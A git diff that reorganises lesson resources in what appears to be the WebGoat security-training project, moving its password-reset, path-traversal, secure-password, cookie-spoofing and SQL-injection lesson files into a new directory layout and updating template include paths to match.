diff --git a/webgoat-lessons/password-reset/src/main/resources/css/password.css b/src/main/resources/lessons/password_reset/css/password.css
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/css/password.css
rename to src/main/resources/lessons/password_reset/css/password.css
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_SecurityQuestions.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_SecurityQuestions.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_SecurityQuestions.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_SecurityQuestions.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_host_header.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_host_header.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_host_header.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_known_questions.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_known_questions.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_known_questions.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_known_questions.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_mitigation.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_mitigation.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_mitigation.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_mitigation.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_plan.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_plan.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_plan.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_plan.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_simple.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_simple.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_simple.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_simple.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_wrong_message.adoc b/src/main/resources/lessons/password_reset/documentation/PasswordReset_wrong_message.adoc
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/lessonPlans/en/PasswordReset_wrong_message.adoc
rename to src/main/resources/lessons/password_reset/documentation/PasswordReset_wrong_message.adoc
diff --git a/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html b/src/main/resources/lessons/password_reset/html/PasswordReset.html
similarity index 93%
rename from webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html
rename to src/main/resources/lessons/password_reset/html/PasswordReset.html
index 5df435c24..4a292e009 100644
--- a/webgoat-lessons/password-reset/src/main/resources/html/PasswordReset.html
+++ b/src/main/resources/lessons/password_reset/html/PasswordReset.html
@@ -3,10 +3,10 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_plan.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_simple.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_simple.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/password.css}"/>
     <script th:src="@{/lesson_js/bootstrap.min.js}" language="JavaScript"></script>
@@ -90,11 +90,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_wrong_message.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_wrong_message.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_known_questions.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_known_questions.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/password.css}"/>
     <script th:src="@{/lesson_js/bootstrap.min.js}" language="JavaScript"></script>
@@ -138,7 +138,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_SecurityQuestions.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_SecurityQuestions.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -168,7 +168,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_host_header.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_host_header.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -260,6 +260,6 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PasswordReset_mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_mitigation.adoc"></div>
 </div>
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/password_reset/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/password_reset/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/password-reset/src/main/resources/images/reset1.png b/src/main/resources/lessons/password_reset/images/reset1.png
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/images/reset1.png
rename to src/main/resources/lessons/password_reset/images/reset1.png
diff --git a/webgoat-lessons/password-reset/src/main/resources/images/reset2.png b/src/main/resources/lessons/password_reset/images/reset2.png
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/images/reset2.png
rename to src/main/resources/lessons/password_reset/images/reset2.png
diff --git a/webgoat-lessons/password-reset/src/main/resources/images/slack1.png b/src/main/resources/lessons/password_reset/images/slack1.png
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/images/slack1.png
rename to src/main/resources/lessons/password_reset/images/slack1.png
diff --git a/webgoat-lessons/password-reset/src/main/resources/images/slack2.png b/src/main/resources/lessons/password_reset/images/slack2.png
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/images/slack2.png
rename to src/main/resources/lessons/password_reset/images/slack2.png
diff --git a/webgoat-lessons/password-reset/src/main/resources/js/password-reset-simple.js b/src/main/resources/lessons/password_reset/js/password-reset-simple.js
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/js/password-reset-simple.js
rename to src/main/resources/lessons/password_reset/js/password-reset-simple.js
diff --git a/webgoat-lessons/password-reset/src/main/resources/templates/password_link_not_found.html b/src/main/resources/lessons/password_reset/templates/password_link_not_found.html
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/templates/password_link_not_found.html
rename to src/main/resources/lessons/password_reset/templates/password_link_not_found.html
diff --git a/webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html b/src/main/resources/lessons/password_reset/templates/password_reset.html
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/templates/password_reset.html
rename to src/main/resources/lessons/password_reset/templates/password_reset.html
diff --git a/webgoat-lessons/password-reset/src/main/resources/templates/success.html b/src/main/resources/lessons/password_reset/templates/success.html
similarity index 100%
rename from webgoat-lessons/password-reset/src/main/resources/templates/success.html
rename to src/main/resources/lessons/password_reset/templates/success.html
diff --git a/webgoat-lessons/path-traversal/src/main/resources/css/path_traversal.css b/src/main/resources/lessons/path_traversal/css/path_traversal.css
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/css/path_traversal.css
rename to src/main/resources/lessons/path_traversal/css/path_traversal.css
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_intro.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_intro.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_intro.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_intro.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_retrieval.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_retrieval.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_retrieval.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_retrieval.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fix.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fix.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fixed.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fixed.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_fixed.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fixed.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_mitigation.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_mitigation.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_mitigation.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_mitigation.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_remove_user_input.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_upload_remove_user_input.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_assignment.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_assignment.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc b/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_solution.adoc
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
rename to src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_solution.adoc
diff --git a/webgoat-lessons/path-traversal/src/main/resources/html/PathTraversal.html b/src/main/resources/lessons/path_traversal/html/PathTraversal.html
similarity index 92%
rename from webgoat-lessons/path-traversal/src/main/resources/html/PathTraversal.html
rename to src/main/resources/lessons/path_traversal/html/PathTraversal.html
index 135be2be6..d56f8e8f9 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/html/PathTraversal.html
+++ b/src/main/resources/lessons/path_traversal/html/PathTraversal.html
@@ -5,11 +5,11 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_upload.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_upload.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -63,7 +63,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_upload_fix.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -118,7 +118,7 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_upload_remove_user_input.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -174,7 +174,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_retrieval.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_retrieval.adoc"></div>
     <div class="attack-container">
 
         <div class="container-fluid">
@@ -212,11 +212,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_zip_slip.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_zip_slip.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:PathTraversal_zip_slip_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -273,8 +273,8 @@
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:PathTraversal_zip_slip_solution.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_zip_slip_solution.adoc"></div>
     </div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/path-traversal/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/path_traversal/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/path_traversal/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/account.png b/src/main/resources/lessons/path_traversal/images/account.png
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/account.png
rename to src/main/resources/lessons/path_traversal/images/account.png
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/1.jpg b/src/main/resources/lessons/path_traversal/images/cats/1.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/1.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/1.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/10.jpg b/src/main/resources/lessons/path_traversal/images/cats/10.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/10.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/10.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/2.jpg b/src/main/resources/lessons/path_traversal/images/cats/2.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/2.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/2.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/3.jpg b/src/main/resources/lessons/path_traversal/images/cats/3.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/3.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/3.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/4.jpg b/src/main/resources/lessons/path_traversal/images/cats/4.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/4.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/4.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/5.jpg b/src/main/resources/lessons/path_traversal/images/cats/5.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/5.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/5.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/6.jpg b/src/main/resources/lessons/path_traversal/images/cats/6.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/6.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/6.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/7.jpg b/src/main/resources/lessons/path_traversal/images/cats/7.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/7.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/7.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/8.jpg b/src/main/resources/lessons/path_traversal/images/cats/8.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/8.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/8.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/images/cats/9.jpg b/src/main/resources/lessons/path_traversal/images/cats/9.jpg
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/images/cats/9.jpg
rename to src/main/resources/lessons/path_traversal/images/cats/9.jpg
diff --git a/webgoat-lessons/path-traversal/src/main/resources/js/path_traversal.js b/src/main/resources/lessons/path_traversal/js/path_traversal.js
similarity index 100%
rename from webgoat-lessons/path-traversal/src/main/resources/js/path_traversal.js
rename to src/main/resources/lessons/path_traversal/js/path_traversal.js
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_1.adoc b/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_1.adoc
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_1.adoc
rename to src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_1.adoc
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_2.adoc b/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_2.adoc
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_2.adoc
rename to src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_2.adoc
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_3.adoc b/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_3.adoc
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_3.adoc
rename to src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_3.adoc
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_4.adoc b/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_4.adoc
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_4.adoc
rename to src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_4.adoc
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_assignment_introduction.adoc b/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_assignment_introduction.adoc
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_assignment_introduction.adoc
rename to src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_assignment_introduction.adoc
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_intro.adoc b/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_intro.adoc
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/lessonPlans/en/SecurePasswords_intro.adoc
rename to src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_intro.adoc
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html b/src/main/resources/lessons/secure_passwords/html/SecurePasswords.html
similarity index 68%
rename from webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html
rename to src/main/resources/lessons/secure_passwords/html/SecurePasswords.html
index 27c1e076b..b08b6dce2 100644
--- a/webgoat-lessons/secure-passwords/src/main/resources/html/SecurePasswords.html
+++ b/src/main/resources/lessons/secure_passwords/html/SecurePasswords.html
@@ -3,19 +3,19 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SecurePasswords_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SecurePasswords_1.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_1.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SecurePasswords_2.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_2.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SecurePasswords_assignment_introduction.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_assignment_introduction.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -39,11 +39,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SecurePasswords_3.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_3.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:SecurePasswords_4.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_4.adoc"></div>
 </div>
 
 <script>
@@ -58,4 +58,4 @@
 </script>
 
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/i18n/WebGoatLabels_nl.properties b/src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels_nl.properties
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/i18n/WebGoatLabels_nl.properties
rename to src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels_nl.properties
diff --git a/webgoat-lessons/secure-passwords/src/main/resources/js/questions_cia.json b/src/main/resources/lessons/secure_passwords/js/questions_cia.json
similarity index 100%
rename from webgoat-lessons/secure-passwords/src/main/resources/js/questions_cia.json
rename to src/main/resources/lessons/secure_passwords/js/questions_cia.json
diff --git a/webgoat-lessons/sol.MD b/src/main/resources/lessons/sol.MD
similarity index 100%
rename from webgoat-lessons/sol.MD
rename to src/main/resources/lessons/sol.MD
diff --git a/webgoat-lessons/sol.txt b/src/main/resources/lessons/sol.txt
similarity index 100%
rename from webgoat-lessons/sol.txt
rename to src/main/resources/lessons/sol.txt
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_content0.adoc b/src/main/resources/lessons/spoofcookie/documentation/SpoofCookie_content0.adoc
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_content0.adoc
rename to src/main/resources/lessons/spoofcookie/documentation/SpoofCookie_content0.adoc
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_plan.adoc b/src/main/resources/lessons/spoofcookie/documentation/SpoofCookie_plan.adoc
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/lessonPlans/en/SpoofCookie_plan.adoc
rename to src/main/resources/lessons/spoofcookie/documentation/SpoofCookie_plan.adoc
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html b/src/main/resources/lessons/spoofcookie/html/SpoofCookie.html
similarity index 68%
rename from webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
rename to src/main/resources/lessons/spoofcookie/html/SpoofCookie.html
index a59ab3cc7..9077554bf 100644
--- a/webgoat-lessons/spoof-cookie/src/main/resources/html/SpoofCookie.html
+++ b/src/main/resources/lessons/spoofcookie/html/SpoofCookie.html
@@ -9,19 +9,19 @@
 
 <!-- 1 -->
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:SpoofCookie_plan.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/spoofcookie/documentation/SpoofCookie_plan.adoc"></div>
 </div>
 
 <!-- 2 -->
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:SpoofCookie_content0.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/spoofcookie/documentation/SpoofCookie_content0.adoc"></div>
 	<div class="attack-container">
 		<div class="assignment-success">
 			<i class="fa fa-2 fa-check hidden" aria-hidden="true"></i>
 		</div>
 
 		<div class="container-fluid">
-			<div th:include="spoofcookieform" id="content"></div>
+			<div th:include="/lessons/spoofcookie/templates/spoofcookieform.html" id="content"></div>
 		</div>
 
 		<div class="attack-feedback" id="spoof_attack_feedback"></div>
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/spoofcookie/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/spoofcookie/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/js/handler.js b/src/main/resources/lessons/spoofcookie/js/handler.js
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/js/handler.js
rename to src/main/resources/lessons/spoofcookie/js/handler.js
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/en/SpoofCookie_solution.adoc b/src/main/resources/lessons/spoofcookie/lessonSolutions/en/SpoofCookie_solution.adoc
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/en/SpoofCookie_solution.adoc
rename to src/main/resources/lessons/spoofcookie/lessonSolutions/en/SpoofCookie_solution.adoc
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/html/SpoofCookie.html b/src/main/resources/lessons/spoofcookie/lessonSolutions/html/SpoofCookie.html
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/lessonSolutions/html/SpoofCookie.html
rename to src/main/resources/lessons/spoofcookie/lessonSolutions/html/SpoofCookie.html
diff --git a/webgoat-lessons/spoof-cookie/src/main/resources/templates/spoofcookieform.html b/src/main/resources/lessons/spoofcookie/templates/spoofcookieform.html
similarity index 100%
rename from webgoat-lessons/spoof-cookie/src/main/resources/templates/spoofcookieform.html
rename to src/main/resources/lessons/spoofcookie/templates/spoofcookieform.html
diff --git a/webgoat-lessons/sql-injection/src/main/resources/css/assignments.css b/src/main/resources/lessons/sql_injection/css/assignments.css
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/css/assignments.css
rename to src/main/resources/lessons/sql_injection/css/assignments.css
diff --git a/webgoat-lessons/sql-injection/src/main/resources/css/challenge.css b/src/main/resources/lessons/sql_injection/css/challenge.css
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/css/challenge.css
rename to src/main/resources/lessons/sql_injection/css/challenge.css
diff --git a/webgoat-container/src/main/resources/static/css/quiz.css b/src/main/resources/lessons/sql_injection/css/quiz.css
similarity index 100%
rename from webgoat-container/src/main/resources/static/css/quiz.css
rename to src/main/resources/lessons/sql_injection/css/quiz.css
